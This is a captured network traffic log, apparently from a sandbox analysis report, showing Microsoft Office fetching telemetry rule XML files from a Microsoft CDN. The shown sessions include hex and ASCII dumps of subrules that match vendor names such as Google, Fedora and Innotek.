                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:45 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 448
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                      x-ms-request-id: c1a1e3cb-901e-005b-1f8c-3a2005000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164145Z-r1d97b99577d6qrbhC1TEBux5s000000094000000000vy97
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:45 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      54192.168.2.74976313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:44 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:45 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 491
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                      x-ms-request-id: e456cfdf-c01e-0014-248c-3aa6a3000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164145Z-185f5d8b95c68cvnhC1NYCfn7s0000000af000000000peh4
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:45 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      55192.168.2.74976413.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:46 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:47 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 416
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                      x-ms-request-id: 5b8b83f7-201e-0033-0b8c-3ab167000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164147Z-r1d97b99577656nchC1TEBk98c000000097g000000004s42
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      56192.168.2.74976513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:46 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:47 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                      x-ms-request-id: a1cdeef9-f01e-0020-348c-3a956b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164147Z-r1d97b99577sdxndhC1TEBec5n00000009a0000000004k1a
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      57192.168.2.74976613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:47 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                      x-ms-request-id: 0514cbb3-901e-00ac-0281-3ab69e000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164147Z-185f5d8b95cp7lkfhC1NYC7rpw0000000aq0000000007cg3
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      58192.168.2.74976713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:47 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                      x-ms-request-id: b82dc135-b01e-0053-1a8c-3acdf8000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164147Z-1777c6cb754vxwc9hC1TEBykgw00000009yg0000000008qe
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      59192.168.2.74976813.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:47 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                      x-ms-request-id: 7511da03-801e-0083-3b8c-3af0ae000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164147Z-185f5d8b95c96jn4hC1NYCbgp80000000am00000000007cf
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:47 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      60192.168.2.74976913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:49 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:49 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                      x-ms-request-id: bdf96f18-c01e-0066-808c-3aa1ec000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164149Z-185f5d8b95c4hl5whC1NYCeex00000000ae000000000d87m
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:49 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      61192.168.2.74977013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:49 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:49 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                      x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164149Z-185f5d8b95cdtclvhC1NYC4rmc0000000ak000000000vb19
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:49 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      62192.168.2.74977113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:49 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:49 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                      x-ms-request-id: 2155a01d-401e-00a3-768c-3a8b09000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164149Z-185f5d8b95crwqd8hC1NYCps680000000ad000000000vsqk
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
